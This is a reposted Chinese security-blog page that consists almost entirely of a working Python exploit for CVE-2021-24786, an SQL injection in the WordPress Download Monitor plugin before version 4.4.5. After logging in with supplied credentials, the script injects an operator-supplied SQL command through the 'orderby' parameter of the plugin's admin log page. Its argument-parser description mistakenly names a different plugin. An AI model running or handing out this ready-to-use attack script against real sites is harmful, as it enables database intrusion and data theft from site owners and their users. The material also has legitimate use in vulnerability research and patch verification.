Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection
Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection
Khan安全团队
发布于 2022-03-03 09:26:46
发布于 2022-03-03 09:26:46
文章被收录于专栏:Khan安全团队
# 测试环境:Ubuntu 20.04
# CVE:CVE-2021-24786
# CWE:CWE-89
# 文档:https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24786/README.md
'''
描述:
4.4.5 之前的 Download Monitor WordPress 插件无法正确验证和转义“orderby”GET 参数
在查看日志时在 SQL 语句中使用它之前,会导致 SQL 注入问题
'''
# Banner:
banner = '''
___ __ ____ ___ ____ _ ____ _ _ _____ ___ __
/ __\/\ /\/__\ |___ \ / _ \___ \/ | |___ \| || |___ ( _ ) / /_
/ / \ \ / /_\_____ __) | | | |__) | |_____ __) | || |_ / // _ \| '_ \
/ /___ \ V //_|_____/ __/| |_| / __/| |_____/ __/|__ _/ /| (_) | (_) |
\____/ \_/\__/ |_____|\___/_____|_| |_____| |_|/_/ \___/ \___/
[+] Download Monitor - SQL-Injection
[@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)
import argparse
import requests
from datetime import datetime
# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)
# Exploit (WORKS ONLY IF ONE LOG EXISTS)
print('')
print ('[i] If the exploit does not work, log into wp-admin and add a file and download it to create a log')
print('')
# Generate payload for SQL-Injection
sql_injection_code = input('[+] SQL-INJECTION COMMAND: ')
sql_injection_code = sql_injection_code.replace(' ', '+')
exploitcode_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`' + sql_injection_code + '`user_id'
exploit = session.get(exploitcode_url)
print(exploit)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
相关产品与服务
网站建设
网站建设(Website Design Service,WDS),是帮助您快速搭建企业网站的服务。通过自助模板建站工具及专业设计服务,无需了解代码技术,即可自由拖拽模块,可视化完成网站管理。全功能管理后台操作方便,一次更新,数据多端同步,省时省心。使用网站建设服务,您无需维持技术和设计师团队,即可快速实现网站上线,达到企业数字化转型的目的。
腾讯云开发者
